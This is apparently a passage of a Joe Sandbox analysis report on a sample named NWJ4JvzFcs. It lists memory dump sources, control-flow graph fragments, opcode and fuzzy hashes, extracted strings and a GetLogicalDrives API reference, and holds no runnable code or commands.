                                                      • Opcode ID: 974d9293852c269d3ae07b343463556aeb79df37e2e48965c46ae1d1d41998de
                                                      • Instruction ID: c82dc25e3c6ba8aa9f9b6c27f97ab6476afeeefa1fbe4fa5ee1037cd375cdaf6
                                                      • Opcode Fuzzy Hash: 974d9293852c269d3ae07b343463556aeb79df37e2e48965c46ae1d1d41998de
                                                      • Instruction Fuzzy Hash: C2319EFB05D125AEA24286966B28EFB6B3DE5C7734B3088BBF506D6442E2D80B4D5131

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 564 7940243-794024c 565 79401e7-794023e 564->565 566 794024e-7940250 564->566 567 7940252-79403cf 565->567 566->567 590 79403d0-79403d7 GetLogicalDrives call 79403e3 567->590 592 79403dc-79403ef 590->592 592->590 593 79403f1-7940409 592->593
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675

                                                      Control-flow Graph

                                                      control_flow_graph 595 794020c-7940213 596 7940215-7940218 595->596 597 794021a-7940221 595->597 598 7940223-79403cf 596->598 597->598 619 79403d0-79403d7 GetLogicalDrives call 79403e3 598->619 621 79403dc-79403ef 619->621 621->619 622 79403f1-7940409 621->622
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: befb57ea0d24f3067f1910a4c92d897c1831ee4d95e4c3764a13f1ed6a055cc5
                                                      • Instruction ID: 98e514b7aaa586dacd4d1a029dfa662b8a4b2931feee7bf18074f6a7bca65b59
                                                      • Opcode Fuzzy Hash: befb57ea0d24f3067f1910a4c92d897c1831ee4d95e4c3764a13f1ed6a055cc5
                                                      • Instruction Fuzzy Hash: 90412EEB42C034BC6552E5882B54AFA7B6EF5D3339B304C26F803D661AE2D44E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: add3ce99dc9cf8c0b4be93193cda1f36779f96354a10e26fbc2f07b63701d20b
                                                      • Instruction ID: da34a718b97a161dc166d37819df1dbfbd5c8884d456a263ed5ecf251a8f9a22
                                                      • Opcode Fuzzy Hash: add3ce99dc9cf8c0b4be93193cda1f36779f96354a10e26fbc2f07b63701d20b
                                                      • Instruction Fuzzy Hash: 97412DEB01C034BD6552E5882B54AFB7B6EE6D3339B304C26F803E661AE2D54E4B7130
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6129b06a7b1b56810b9fe74f17a39392d2eacd04b41c177f4c128120b2d8df6
                                                      • Instruction ID: 72437edea5fbc88e0aafa6c30b59d936ab91d35922b0a183d2e980981e270949
                                                      • Opcode Fuzzy Hash: d6129b06a7b1b56810b9fe74f17a39392d2eacd04b41c177f4c128120b2d8df6
                                                      • Instruction Fuzzy Hash: FB31EAEB01C034BD6562E5892B54AFA776EE6D3338B304827F803E6619E2D44E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 951c3e0211d5858a2dd0f86e3514af70421feb42195e96168af17cfe2d1baa90
                                                      • Instruction ID: 7bcb8b3e7ab01c216354ce54d6948e3700437d57a375af30edabce81466cb166
                                                      • Opcode Fuzzy Hash: 951c3e0211d5858a2dd0f86e3514af70421feb42195e96168af17cfe2d1baa90
                                                      • Instruction Fuzzy Hash: DE310AEB01C035BD6562E5892B54AFA7B6EE1D3338B304826F843D661AE2D44E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40dce34533b4fe51c4e7e39d0b0b1ec807c2d994696bf4b3ef3ba0890772f447
                                                      • Instruction ID: 8a095458c4651d12283978b260fd60b065f19e3b6c07fb09975823fad1cb9c76
                                                      • Opcode Fuzzy Hash: 40dce34533b4fe51c4e7e39d0b0b1ec807c2d994696bf4b3ef3ba0890772f447
                                                      • Instruction Fuzzy Hash: CB31E7EB01C135BD6562E5892B54AFA7B6EE2D3338F304C26F803E6619E2D54E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9d5d89fabdb5c13d0c8ce5b6a55cec128912c45a8e02a016eec866f8627cdbe
                                                      • Instruction ID: 9de2dfc20047b1782094e245f8ccca599b80647d78a350c24dc9ca3573718259
                                                      • Opcode Fuzzy Hash: e9d5d89fabdb5c13d0c8ce5b6a55cec128912c45a8e02a016eec866f8627cdbe
                                                      • Instruction Fuzzy Hash: 0C3139FB42C134AD6656E5882750AFA7B6EE6D3338F304C26F803A661AD2D00E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b27394f42931e3ebb89e03489229354180ec4177c8844166675440430798fead
                                                      • Instruction ID: 4830b35538080485bc59d0074d6640bcbdb3e340ca9ea844e0254a169feb0c24
                                                      • Opcode Fuzzy Hash: b27394f42931e3ebb89e03489229354180ec4177c8844166675440430798fead
                                                      • Instruction Fuzzy Hash: BE2139EB02C034AD6662F18827606FA7B6EE6D7338F304C62A807A7619D2D00E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dcb2b464f0d0366362826d78d602ce12d535a91fca328169f21c5b0d76bfe1ae
                                                      • Instruction ID: e0e263ef2e624a7e55e7407b963447a9751a13e389e4ded3f6042018ed18d948
                                                      • Opcode Fuzzy Hash: dcb2b464f0d0366362826d78d602ce12d535a91fca328169f21c5b0d76bfe1ae
                                                      • Instruction Fuzzy Hash: 36214CEB02C134ADA662F18817546F97B6AE69733DF300862E843AB629D1D00E4B7121
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d60fe9b2d8f7e14ed3b5c21bca937ec833af4a64b3fa54476caa443e1ffddbc9
                                                      • Instruction ID: e7765e7736a579ffff817d8b3f05fb70ed71b1362dc0c00d4b4e2c9db785870e
                                                      • Opcode Fuzzy Hash: d60fe9b2d8f7e14ed3b5c21bca937ec833af4a64b3fa54476caa443e1ffddbc9
                                                      • Instruction Fuzzy Hash: 7B215CFB42C134AD5662F58C57506FA7B69E69733CF300C66E8436B629D2D00E477121
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c8bffa9cd2c1646e7365958b0f157a7f51d88fe06528a696945c45e36eb0f38
                                                      • Instruction ID: a03c65a4fe7ef559d658155f164698685eab3ca83d6e6dbc3bd10e9bdecacab6
                                                      • Opcode Fuzzy Hash: 4c8bffa9cd2c1646e7365958b0f157a7f51d88fe06528a696945c45e36eb0f38
                                                      • Instruction Fuzzy Hash: 2721ADE72583506D9263509C57106FB6F6EF7D3734B758827F402DB283E3C59A094272
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57443d39e1e34da000258d132f40949a3454446b2e4fc9c08b95af288c4afeee
                                                      • Instruction ID: 7061005cf78ea476b0d1a80c6907ca32e56d0c7094e9677a4893021da3b4e33a
                                                      • Opcode Fuzzy Hash: 57443d39e1e34da000258d132f40949a3454446b2e4fc9c08b95af288c4afeee
                                                      • Instruction Fuzzy Hash: 08213AEB02C134BD69A2F58C17506FA7A6AA69733DF300C62B847A762AD2D04D477121
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b94c08cdbbf2f9e8254a133448945e7b27a8c2d184a7bd61d01738d1cbf4df2a
                                                      • Instruction ID: 40e8f3fc6d8b7be08211fbc813fd48855c7f05fb82a6c4f549f41f4f1060382d
                                                      • Opcode Fuzzy Hash: b94c08cdbbf2f9e8254a133448945e7b27a8c2d184a7bd61d01738d1cbf4df2a
                                                      • Instruction Fuzzy Hash: C82138EB25C3103DB25284985F10AFB1B6FE7D3634731882BF406C6283E2D98E4E5231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 730c1965ef6300e85aa5b4576c219cfa2cd97dac70197e72db9ac196a19cc09e
                                                      • Instruction ID: 339b8935e82b3d217cb4528ac82d8bac96f7a1d9e1c7c0374f7e96a3287d8c16
                                                      • Opcode Fuzzy Hash: 730c1965ef6300e85aa5b4576c219cfa2cd97dac70197e72db9ac196a19cc09e
                                                      • Instruction Fuzzy Hash: 231136EB2582203CB55244885B10AF75B6FF7D3634730C92BF402C6243E2D59E4E5231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d44fa280743e7fcc332be16d30938f11aadc7ac5ba815ef70ff82a6fed8c7e16
                                                      • Instruction ID: b2b04d6c6f190fa22f2d08694260efd99df85e60cea790444e3a3b6b85a8fc13
                                                      • Opcode Fuzzy Hash: d44fa280743e7fcc332be16d30938f11aadc7ac5ba815ef70ff82a6fed8c7e16
                                                      • Instruction Fuzzy Hash: 151157EB2583203CB11240986B109FB6B6FF6D3734331C82BF406C6643E2D99E4E5232
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24e8bcf677ab4fcb311ff67f787c4c5c62c5ed88bd0637645e5e87580e1e3787
                                                      • Instruction ID: 9d36208ff24fdf15d6033d7dc8a0a32cff5e8535679fb8de14eeef5495483e4b
                                                      • Opcode Fuzzy Hash: 24e8bcf677ab4fcb311ff67f787c4c5c62c5ed88bd0637645e5e87580e1e3787
                                                      • Instruction Fuzzy Hash: 78115CF602C034ADA612F58D17546FA3BA9A7D3338F304C66A84297569D2D149477132
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fd6612fcbb747639c7a61b19caea892c2fd4b79f87206e2c5ae1e0d5dde74af
                                                      • Instruction ID: ea584a63fb3cc61102e64ca1f4daa6ed39faeed0efa67b00353404226655ae7a
                                                      • Opcode Fuzzy Hash: 9fd6612fcbb747639c7a61b19caea892c2fd4b79f87206e2c5ae1e0d5dde74af
                                                      • Instruction Fuzzy Hash: EF119EE702C034BDA652E5C817947FA3B6AA793339F300C66A8436A65ED1D50E4B7131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fe47113c1d216289b36d9043e43921ee87204bbf151ef697f2273309a72fde6
                                                      • Instruction ID: a5c55c45acaba2ad1861e1ae731ec03aa48f9008e6ccc0cf31da770658e300b9
                                                      • Opcode Fuzzy Hash: 2fe47113c1d216289b36d9043e43921ee87204bbf151ef697f2273309a72fde6
                                                      • Instruction Fuzzy Hash: 391157F6028034AEA652F58D17546FA3BAAA7D3338F304C2AA843A7169D2D14D4BB131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 261e27cd08262e306f72bb900aae663acb364dc394efd1c37f07f4fe3dc18e05
                                                      • Instruction ID: 713e6ee474343d1ab8df3c8f7bc9f95c1f387471c647c87e37ac177c7085175a
                                                      • Opcode Fuzzy Hash: 261e27cd08262e306f72bb900aae663acb364dc394efd1c37f07f4fe3dc18e05
                                                      • Instruction Fuzzy Hash: BF119EFB02C134AED703FA985B542FA3BB4D6D3338B304C66D842A716AD5E14D4BA231
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f24be62d33d98865bee20ea69aeb9a1f16bc659e85a306854c0b1d2089ee88b
                                                      • Instruction ID: 09f41b5c9fd4df26509033bc2667e38c424628746ef86af28e586dee72187850
                                                      • Opcode Fuzzy Hash: 4f24be62d33d98865bee20ea69aeb9a1f16bc659e85a306854c0b1d2089ee88b
                                                      • Instruction Fuzzy Hash: 23117AFB02C034ADA652F58827546FA3B6AE6D3339F304C66E8436666ED1D00D47B131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31851c77857689fc2e5fe8e2709b981a4dc53939b87ccad1baa2d4296fdbe411
                                                      • Instruction ID: ab7ff40814c57418b3a185afde0cea1c55259630480ebda64c3cdfd7ced971d1
                                                      • Opcode Fuzzy Hash: 31851c77857689fc2e5fe8e2709b981a4dc53939b87ccad1baa2d4296fdbe411
                                                      • Instruction Fuzzy Hash: 731159F70180349EA602E68857546FA3769D7D3339F304C66E80667168D1D04D4BB131
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ba0dba92602e5fc75b5f3696efd5fda2b98449935102156cc132a72cf3bcee8
                                                      • Instruction ID: 568d3be2aad8d3f0745b77cfa9603f8ef9a54afc91d52d376a49dcf02f12dd80
                                                      • Opcode Fuzzy Hash: 7ba0dba92602e5fc75b5f3696efd5fda2b98449935102156cc132a72cf3bcee8
                                                      • Instruction Fuzzy Hash: FC016BF7018034AEA602E6C817546FA3769D7D3335F304C6AA84367168C5E14D4BB132
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76cfd1b644e5197ea6e2899d8e3de25efe22c1be2101efd816004a86b85f4df2
                                                      • Instruction ID: 73a8b6bd9fd581b9341061a0f458c4fba2a718beaa897ea53df0f467fa6eb2d3
                                                      • Opcode Fuzzy Hash: 76cfd1b644e5197ea6e2899d8e3de25efe22c1be2101efd816004a86b85f4df2
                                                      • Instruction Fuzzy Hash: 210147F702C1389D8A06F69C23642FE3FA5AA87239F304D6BD8466E178D5A14947F251
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      • Instruction Fuzzy Hash: 56A011B200008A82032800AA0220ACBA8AA82888282E30228880AEBA008022CA0E08E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 7bff4b5b22a49d2690b8acdf07c8c5c8a401828a515f06683946d0894d952c6d
                                                      • Instruction ID: a9dcdc7765a38679dd910b0d59db7d76c1b17f62811a8a768fae427e1452c808
                                                      • Opcode Fuzzy Hash: 7bff4b5b22a49d2690b8acdf07c8c5c8a401828a515f06683946d0894d952c6d
                                                      • Instruction Fuzzy Hash: 0AB0123355543F4AE5025E0C5D140A6231CEB04D40798052AAC08CF290C5234244C6D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: b9d4fdf566834f81c08462d89b3f3e2666103ff0acb887e875a76fececc43390
                                                      • Instruction ID: 9696c7c4b6e40c7375251cd6c45234a3ff1580746b9da5970af594c2ca3d7db6
                                                      • Opcode Fuzzy Hash: b9d4fdf566834f81c08462d89b3f3e2666103ff0acb887e875a76fececc43390
                                                      • Instruction Fuzzy Hash: DFA012738842AA10030212E80202608BD4A040589070903265C007F08AF14245010084
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 5a6bb00fb32d660d4e1039c0913c3697d6c1836d170ec53d5da6ee05fe61ab9e
                                                      • Instruction ID: be0e42acc526f894d09a7b7a0013976f92b5419aa347469fc82a1e842d0fcd2e
                                                      • Opcode Fuzzy Hash: 5a6bb00fb32d660d4e1039c0913c3697d6c1836d170ec53d5da6ee05fe61ab9e
                                                      • Instruction Fuzzy Hash:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: c36c1ac16ac20fe811f2e44c379e0a4e1fc021f305c41be540312e86f1ba225d
                                                      • Instruction ID: 75481086d54e9e6a0e40737de78519ef20d9076bcf1220a5e5732535d1716075
                                                      • Opcode Fuzzy Hash: c36c1ac16ac20fe811f2e44c379e0a4e1fc021f305c41be540312e86f1ba225d
                                                      • Instruction Fuzzy Hash:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: a5707a216f016a686301a30974ac427b7389b200a1ad89a141e7dbbdb4ba596a
                                                      • Instruction ID: 40d53acf7437acb7f87678c808938ad1ace035f6c42726e866f1d953f0eb7f59
                                                      • Opcode Fuzzy Hash: a5707a216f016a686301a30974ac427b7389b200a1ad89a141e7dbbdb4ba596a
                                                      • Instruction Fuzzy Hash: D1A00231543B2D4687496D0059A29CE63186D45548B65461C890487155DB10440E4290
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: 4e1cb58632375a32260ab80e6b1c87c9fb7d4996183ed7864bf685704436adf6
                                                      • Instruction ID: d7326c7d074f0daed1b62de5eb5f46b2ef64cd636b90399ed7800c482bc45cac
                                                      • Opcode Fuzzy Hash: 4e1cb58632375a32260ab80e6b1c87c9fb7d4996183ed7864bf685704436adf6
                                                      • Instruction Fuzzy Hash:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: a17d621547a3395501de539d17b1bda3ab1a97c07678bba2cf271335109b764b
                                                      • Instruction ID: a7abb54058c86d92a13b15c6aa3cdddc6b68cdd1afc2dc5f30fb4fe82332ca99
                                                      • Opcode Fuzzy Hash: a17d621547a3395501de539d17b1bda3ab1a97c07678bba2cf271335109b764b
                                                      • Instruction Fuzzy Hash:
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441283675.0000000007970000.00000040.00001000.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7970000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PR$ZXaP$``$`$aZX_
                                                      • API String ID: 0-1735362157
                                                      • Opcode ID: efe0d363315c29cddf03cc16ebeb3c19bb0b91bc41932eba4bf8f9c77616e5c1
                                                      • Instruction ID: 201a8aab55fa3d28ca4dac37ec34a262b2ee7f663f7eb6ac142dcfde1c53df6a
                                                      • Opcode Fuzzy Hash: efe0d363315c29cddf03cc16ebeb3c19bb0b91bc41932eba4bf8f9c77616e5c1
                                                      • Instruction Fuzzy Hash: CDA0222033080020C82C0F3880208CE8200A22000C32CCE038C80E3302EA30B82A0FF0